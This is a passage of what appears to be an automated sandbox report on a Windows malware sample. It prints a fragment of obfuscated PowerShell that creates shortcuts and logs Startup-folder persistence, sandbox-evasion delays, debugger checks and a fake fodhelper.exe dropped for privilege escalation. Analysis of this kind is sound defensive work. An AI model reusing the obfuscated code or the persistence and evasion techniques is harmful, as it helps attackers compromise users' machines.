"${_\\///////////////////////_}${_\\\\\\/|\_/|/\\\___\\\\/|_}\${_\\\\\\/|\_/|/\\\___\\\\/|_}.ai" ${/=\/\__/=\/=\/=\_}.WorkingDirectory = "${_\\///////////////////////_}${_\\\\\\/|\_/|/\\\___\\\\/|_}\" ${/=\/\__/=\/=\/=\_}.WindowStyle = 7 ${/=\/\__/=\/=\/=\_}.IconLocation = $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('JQBQAHIAbwBnAHIAYQBtAEYAaQBsAGUAcwAlAFwASQBuAHQAZQByAG4AZQB0ACAARQB4AHAAbABvAHIAZQByAFwAaQBlAHgAcABsAG8AcgBlAC4AZQB4AGUALAAxAA=='))) ${/=\/\__/=\/=\/=\_}.Save() }finally{}}function _____/\_/\/\_/\/=\\\\\\\\\\/////\\\\\\\\\\\\\\\\\\\\\\\{ Param([string]${___/\_/=\___/\_/==},[string]${__/==\/\_/\/=\/\_/}); try{ ${__/\_/=\/=\/=====} = New-Object -ComObject WScript.Shell ${/=\/\__/=\/=\/=\_} = ${__/\_/=\/=\/=====}.CreateShortcut(${___/\_/=\___/\_/==}) ${/=\/\__/=\/=\/=\_}.TargetPath = "${_\\///////////////////////_}${_\\\\\\/|\_/|/\\\___\\\\/|_}\${_\\\\\\/|\_/|/\\\___\\\\/|_}.${_/|\_/|////\__|/_|\\\\\\/|_}" ${/=\/\__/=\/=\/=\_}.Argume
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\_kjfech8_V.lnkJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\_kjfech8_VEX.lnkJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\_kjfech8_VAT.lnkJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\_kjfech8_VAA.lnkJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\_kjfech8_Vy.lnkJump to behavior

            Hooking and other Techniques for Hiding and Protection

            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
            Source: C:\_kjfech8_V\_kjfech8_Vi7.exeCode function: 9_2_6FDCA277 GetModuleHandleW,GetModuleHandleW,GetProcAddress,GetProcAddress,GetLastError,??0scheduler_resource_allocation_error@Concurrency@@QAE@J@Z,_CxxThrowException,GetModuleHandleW,GetProcAddress,GetLastError,GetModuleHandleW,GetProcAddress,GetModuleHandleW,GetProcAddress,GetModuleHandleW,GetProcAddress,GetModuleHandleW,GetProcAddress,GetModuleHandleW,GetProcAddress,GetModuleHandleW,GetProcAddress,GetModuleHandleW,GetProcAddress,GetModuleHandleW,GetProcAddress,GetModuleHandleW,GetProcAddress,GetModuleHandleW,GetProcAddress,GetModuleHandleW,GetProcAddress,GetModuleHandleW,GetProcAddress,GetModuleHandleW,GetProcAddress,GetModuleHandleW,GetProcAddress,GetModuleHandleW,GetProcAddress,9_2_6FDCA277
            Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\cmd.exe, Process information set: NOOPENFILEERRORBOX
            Source: C:\_kjfech8_V\_kjfech8_Vi7.exe, Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
            Source: C:\_kjfech8_V\_kjfech8_Vi7.exe, Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 9939
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 9895
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 9798
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 9858
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Dropped PE file which has not been started: C:\Windows \System32\fodhelper.exe
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Dropped PE file which has not been started: C:\_kjfech8_V\_kjfech8_V.exe (copy)
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Dropped PE file which has not been started: C:\_kjfech8_V\exe.txt
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Dropped PE file which has not been started: C:\_kjfech8_V\MSVCR100.txt
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Dropped PE file which has not been started: C:\_kjfech8_V\WebView2Loader.dll (copy)
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Dropped PE file which has not been started: C:\_kjfech8_V\WebView2Loader.txt
            Source: C:\_kjfech8_V\_kjfech8_Vi7.exe API coverage: 0.2 %
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4080 Thread sleep count: 9939 > 30
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4004 Thread sleep count: 9895 > 30
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7088 Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4384 Thread sleep count: 9858 > 30
            Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
            Source: C:\_kjfech8_V\_kjfech8_Vi7.exeCode function: 9_2_6FDCEFE1 _stat32,__doserrno,_errno,_invalid_parameter_noinfo,_mbspbrk,_errno,__doserrno,_mbctolower,_getdrive,FindFirstFileExA,_mbspbrk,strlen,GetDriveTypeA,free,free,_sopen_s,_fstat32,_close,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FindClose,GetLastError,_dosmaperr,FindClose,9_2_6FDCEFE1
            Source: C:\_kjfech8_V\_kjfech8_Vi7.exeCode function: 9_2_6FDD0F84 _wstat32i64,__doserrno,_errno,_invalid_parameter_noinfo,wcspbrk,_errno,__doserrno,towlower,_getdrive,FindFirstFileExW,wcspbrk,wcslen,GetDriveTypeW,free,free,_wsopen_s,_fstat32i64,_close,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FindClose,GetLastError,_dosmaperr,FindClose,9_2_6FDD0F84
            Source: C:\_kjfech8_V\_kjfech8_Vi7.exeCode function: 9_2_6FDD0B33 _wstat64,__doserrno,_errno,_invalid_parameter_noinfo,wcspbrk,_errno,__doserrno,towlower,_getdrive,FindFirstFileExW,wcspbrk,wcslen,GetDriveTypeW,free,free,_wsopen_s,_fstat64,_close,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FindClose,GetLastError,_dosmaperr,FindClose,9_2_6FDD0B33
            Source: C:\_kjfech8_V\_kjfech8_Vi7.exeCode function: 9_2_6FDCCA9B _malloc_crt,FindClose,FindFirstFileExW,FindNextFileW,FindClose,9_2_6FDCCA9B
            Source: C:\_kjfech8_V\_kjfech8_Vi7.exeCode function: 9_2_6FDCC775 _malloc_crt,FindClose,FindFirstFileExA,FindNextFileA,FindClose,9_2_6FDCC775
            Source: C:\_kjfech8_V\_kjfech8_Vi7.exeCode function: 9_2_6FDD0702 _wstat32,__doserrno,_errno,_invalid_parameter_noinfo,wcspbrk,_errno,__doserrno,towlower,_getdrive,FindFirstFileExW,wcspbrk,wcslen,GetDriveTypeW,free,free,_wsopen_s,_fstat32,_close,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FindClose,GetLastError,_dosmaperr,FindClose,9_2_6FDD0702
            Source: C:\_kjfech8_V\_kjfech8_Vi7.exeCode function: 9_2_6FDCDF35 _wfindfirst32,_errno,_invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_errno,_errno,_errno,wcscpy_s,_invoke_watson,_wfindnext32,_errno,_invalid_parameter_noinfo,_errno,_invalid_parameter_noinfo,FindNextFileW,GetLastError,_errno,_errno,_errno,wcscpy_s,_invoke_watson,_wfindfirst64,_errno,_invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_errno,_errno,_errno,wcscpy_s,_invoke_watson,_wfindnext64,_errno,_invalid_parameter_noinfo,_errno,_invalid_parameter_noinfo,FindNextFileW,GetLastError,_errno,_errno,_errno,wcscpy_s,_invoke_watson,_wfindfirst64i32,_errno,_invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_errno,_errno,_errno,wcscpy_s,_invoke_watson,_wfindnext64i32,_errno,_invalid_parameter_noinfo,_errno,_invalid_parameter_noinfo,FindNextFileW,GetLastError,_errno,_errno,_errno,wcscpy_s,_invoke_watson,_wfindfirst32i64,_errno,_invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_errno,_errno,_errno,wcscpy_s,_invoke_watson,_wfindnext32i64,_errno,_invalid_parameter_noinfo,_errno,_invalid_parameter_noinfo,FindNextFileW,GetLastError,_errno,_errno,_errno,wcscpy_s,_invoke_watson,9_2_6FDCDF35
            Source: C:\_kjfech8_V\_kjfech8_Vi7.exeCode function: 9_2_6FDCFD86 _stat32i64,__doserrno,_errno,_invalid_parameter_noinfo,_mbspbrk,_errno,__doserrno,_mbctolower,_getdrive,FindFirstFileExA,_mbspbrk,strlen,GetDriveTypeA,free,free,_sopen_s,_fstat32i64,_close,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FindClose,GetLastError,_dosmaperr,FindClose,9_2_6FDCFD86
            Source: C:\_kjfech8_V\_kjfech8_Vi7.exeCode function: 9_2_6FD97C6D _wstat64i32,wcspbrk,_getdrive,FindFirstFileExW,wcspbrk,wcslen,_errno,__doserrno,__doserrno,_errno,_invalid_parameter_noinfo,towlower,GetDriveTypeW,free,free,_wsopen_s,_fstat64i32,_close,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FindClose,GetLastError,_dosmaperr,FindClose,9_2_6FD97C6D
            Source: C:\_kjfech8_V\_kjfech8_Vi7.exeCode function: 9_2_6FDCDA38 _findfirst64i32,_errno,_invalid_parameter_noinfo,FindFirstFileExA,GetLastError,_errno,_errno,_errno,strcpy_s,_invoke_watson,_findnext64i32,_errno,_invalid_parameter_noinfo,_errno,_invalid_parameter_noinfo,FindNextFileA,GetLastError,_errno,_errno,_errno,strcpy_s,_invoke_watson,_findfirst32i64,_errno,_invalid_parameter_noinfo,FindFirstFileExA,GetLastError,_errno,_errno,_errno,strcpy_s,_invoke_watson,_findnext32i64,_errno,_invalid_parameter_noinfo,_errno,_invalid_parameter_noinfo,FindNextFileA,GetLastError,_errno,_errno,_errno,strcpy_s,_invoke_watson,_seterrormode,SetErrorMode,9_2_6FDCDA38
            Source: C:\_kjfech8_V\_kjfech8_Vi7.exeCode function: 9_2_6FDCF8B5 _stat64i32,__doserrno,_errno,_invalid_parameter_noinfo,_mbspbrk,_errno,__doserrno,_mbctolower,_getdrive,FindFirstFileExA,_mbspbrk,strlen,GetDriveTypeA,free,free,_sopen_s,_fstat64i32,_close,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FindClose,GetLastError,_dosmaperr,FindClose,9_2_6FDCF8B5
            Source: C:\_kjfech8_V\_kjfech8_Vi7.exeCode function: 9_2_6FDCD4FF _findfirst32,_errno,_invalid_parameter_noinfo,FindFirstFileExA,GetLastError,_errno,_errno,_errno,strcpy_s,_invoke_watson,_findnext32,_errno,_invalid_parameter_noinfo,_errno,_invalid_parameter_noinfo,FindNextFileA,GetLastError,_errno,_errno,_errno,strcpy_s,_invoke_watson,_findfirst64,_errno,_invalid_parameter_noinfo,FindFirstFileExA,GetLastError,_errno,_errno,_errno,strcpy_s,_invoke_watson,_findnext64,_errno,_invalid_parameter_noinfo,_errno,_invalid_parameter_noinfo,FindNextFileA,GetLastError,_errno,_errno,_errno,strcpy_s,_invoke_watson,9_2_6FDCD4FF
            Source: C:\_kjfech8_V\_kjfech8_Vi7.exeCode function: 9_2_6FDCF40B _stat64,__doserrno,_errno,_invalid_parameter_noinfo,_mbspbrk,_errno,__doserrno,_mbctolower,_getdrive,FindFirstFileExA,_mbspbrk,strlen,GetDriveTypeA,free,free,_sopen_s,_fstat64,_close,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FindClose,GetLastError,_dosmaperr,FindClose,9_2_6FDCF40B
            Source: C:\_kjfech8_V\_kjfech8_Vi7.exeCode function: 11_2_6FDCEFE1 _stat32,__doserrno,_errno,_invalid_parameter_noinfo,_mbspbrk,_errno,__doserrno,_mbctolower,_getdrive,FindFirstFileExA,_mbspbrk,strlen,GetDriveTypeA,free,free,_sopen_s,_fstat32,_close,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FindClose,GetLastError,_dosmaperr,FindClose,11_2_6FDCEFE1
            Source: C:\_kjfech8_V\_kjfech8_Vi7.exeCode function: 11_2_6FDD0F84 _wstat32i64,__doserrno,_errno,_invalid_parameter_noinfo,wcspbrk,_errno,__doserrno,towlower,_getdrive,FindFirstFileExW,wcspbrk,wcslen,GetDriveTypeW,free,free,_wsopen_s,_fstat32i64,_close,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FindClose,GetLastError,_dosmaperr,FindClose,11_2_6FDD0F84
            Source: C:\_kjfech8_V\_kjfech8_Vi7.exeCode function: 11_2_6FDD0B33 _wstat64,__doserrno,_errno,_invalid_parameter_noinfo,wcspbrk,_errno,__doserrno,towlower,_getdrive,FindFirstFileExW,wcspbrk,wcslen,GetDriveTypeW,free,free,_wsopen_s,_fstat64,_close,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FindClose,GetLastError,_dosmaperr,FindClose,11_2_6FDD0B33
            Source: C:\_kjfech8_V\_kjfech8_Vi7.exeCode function: 11_2_6FDCCA9B _malloc_crt,FindClose,FindFirstFileExW,FindNextFileW,FindClose,11_2_6FDCCA9B
            Source: C:\_kjfech8_V\_kjfech8_Vi7.exeCode function: 11_2_6FDCC775 _malloc_crt,FindClose,FindFirstFileExA,FindNextFileA,FindClose,11_2_6FDCC775
            Source: C:\_kjfech8_V\_kjfech8_Vi7.exeCode function: 11_2_6FDD0702 _wstat32,__doserrno,_errno,_invalid_parameter_noinfo,wcspbrk,_errno,__doserrno,towlower,_getdrive,FindFirstFileExW,wcspbrk,wcslen,GetDriveTypeW,free,free,_wsopen_s,_fstat32,_close,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FindClose,GetLastError,_dosmaperr,FindClose,11_2_6FDD0702
            Source: C:\_kjfech8_V\_kjfech8_Vi7.exe Code function: 11_2_6FDCDF35 _wfindfirst32,_errno,_invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_errno,_errno,_errno,wcscpy_s,_invoke_watson,_wfindnext32,_errno,_invalid_parameter_noinfo,_errno,_invalid_parameter_noinfo,FindNextFileW,GetLastError,_errno,_errno,_errno,wcscpy_s,_invoke_watson,_wfindfirst64,_errno,_invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_errno,_errno,_errno,wcscpy_s,_invoke_watson,_wfindnext64,_errno,_invalid_parameter_noinfo,_errno,_invalid_parameter_noinfo,FindNextFileW,GetLastError,_errno,_errno,_errno,wcscpy_s,_invoke_watson,_wfindfirst64i32,_errno,_invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_errno,_errno,_errno,wcscpy_s,_invoke_watson,_wfindnext64i32,_errno,_invalid_parameter_noinfo,_errno,_invalid_parameter_noinfo,FindNextFileW,GetLastError,_errno,_errno,_errno,wcscpy_s,_invoke_watson,_wfindfirst32i64,_errno,_invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_errno,_errno,_errno,wcscpy_s,_invoke_watson,_wfindnext32i64,_errno,_invalid_parameter_noinfo,_errno,_invalid_parameter_noinfo,FindNextFileW,GetLastError,_errno,_errno,_errno,wcscpy_s,_invoke_watson,11_2_6FDCDF35
            Source: C:\_kjfech8_V\_kjfech8_Vi7.exe Code function: 11_2_6FDCFD86 _stat32i64,__doserrno,_errno,_invalid_parameter_noinfo,_mbspbrk,_errno,__doserrno,_mbctolower,_getdrive,FindFirstFileExA,_mbspbrk,strlen,GetDriveTypeA,free,free,_sopen_s,_fstat32i64,_close,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FindClose,GetLastError,_dosmaperr,FindClose,11_2_6FDCFD86
            Source: C:\_kjfech8_V\_kjfech8_Vi7.exe Code function: 11_2_6FD97C6D _wstat64i32,wcspbrk,_getdrive,FindFirstFileExW,wcspbrk,wcslen,_errno,__doserrno,__doserrno,_errno,_invalid_parameter_noinfo,towlower,GetDriveTypeW,free,free,_wsopen_s,_fstat64i32,_close,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FindClose,GetLastError,_dosmaperr,FindClose,11_2_6FD97C6D
            Source: C:\_kjfech8_V\_kjfech8_Vi7.exe Code function: 11_2_6FDCDA38 _findfirst64i32,_errno,_invalid_parameter_noinfo,FindFirstFileExA,GetLastError,_errno,_errno,_errno,strcpy_s,_invoke_watson,_findnext64i32,_errno,_invalid_parameter_noinfo,_errno,_invalid_parameter_noinfo,FindNextFileA,GetLastError,_errno,_errno,_errno,strcpy_s,_invoke_watson,_findfirst32i64,_errno,_invalid_parameter_noinfo,FindFirstFileExA,GetLastError,_errno,_errno,_errno,strcpy_s,_invoke_watson,_findnext32i64,_errno,_invalid_parameter_noinfo,_errno,_invalid_parameter_noinfo,FindNextFileA,GetLastError,_errno,_errno,_errno,strcpy_s,_invoke_watson,_seterrormode,SetErrorMode,11_2_6FDCDA38
            Source: C:\_kjfech8_V\_kjfech8_Vi7.exe Code function: 11_2_6FDCF8B5 _stat64i32,__doserrno,_errno,_invalid_parameter_noinfo,_mbspbrk,_errno,__doserrno,_mbctolower,_getdrive,FindFirstFileExA,_mbspbrk,strlen,GetDriveTypeA,free,free,_sopen_s,_fstat64i32,_close,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FindClose,GetLastError,_dosmaperr,FindClose,11_2_6FDCF8B5
            Source: C:\_kjfech8_V\_kjfech8_Vi7.exe Code function: 11_2_6FDCD4FF _findfirst32,_errno,_invalid_parameter_noinfo,FindFirstFileExA,GetLastError,_errno,_errno,_errno,strcpy_s,_invoke_watson,_findnext32,_errno,_invalid_parameter_noinfo,_errno,_invalid_parameter_noinfo,FindNextFileA,GetLastError,_errno,_errno,_errno,strcpy_s,_invoke_watson,_findfirst64,_errno,_invalid_parameter_noinfo,FindFirstFileExA,GetLastError,_errno,_errno,_errno,strcpy_s,_invoke_watson,_findnext64,_errno,_invalid_parameter_noinfo,_errno,_invalid_parameter_noinfo,FindNextFileA,GetLastError,_errno,_errno,_errno,strcpy_s,_invoke_watson,11_2_6FDCD4FF
            Source: C:\_kjfech8_V\_kjfech8_Vi7.exe Code function: 11_2_6FDCF40B _stat64,__doserrno,_errno,_invalid_parameter_noinfo,_mbspbrk,_errno,__doserrno,_mbctolower,_getdrive,FindFirstFileExA,_mbspbrk,strlen,GetDriveTypeA,free,free,_sopen_s,_fstat64,_close,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FindClose,GetLastError,_dosmaperr,FindClose,11_2_6FDCF40B
            Source: C:\_kjfech8_V\_kjfech8_Vi7.exe Code function: 9_2_6FDF6C74 _resetstkoflw,VirtualQuery,GetSystemInfo,GetModuleHandleW,GetProcAddress,VirtualAlloc,VirtualProtect,9_2_6FDF6C74
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
            Source: C:\Windows\System32\cmd.exe File opened: C:\Users\user\AppData\Roaming\
            Source: C:\Windows\System32\cmd.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\
            Source: C:\Windows\System32\cmd.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\
            Source: C:\Windows\System32\cmd.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\
            Source: C:\Windows\System32\cmd.exe File opened: C:\Users\user\
            Source: C:\Windows\System32\cmd.exe File opened: C:\Users\user\AppData\
            Source: powershell.exe, 00000004.00000002.30098453152.000001E7A28C5000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: <!-- IFRpbWUtU3RhbXAgUENBIDIwMTAwDQYJKoZIhvcNAQEFBQACBQDk2nlVMCIYDzIw -->
            Source: curl.exe, 00000002.00000003.29379278870.000001AA88AA3000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000002.00000002.29379756087.000001AA88AA3000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000002.00000003.29379139326.000001AA88AA0000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation
            Source: C:\_kjfech8_V\_kjfech8_Vi7.exe Process queried: DebugPort
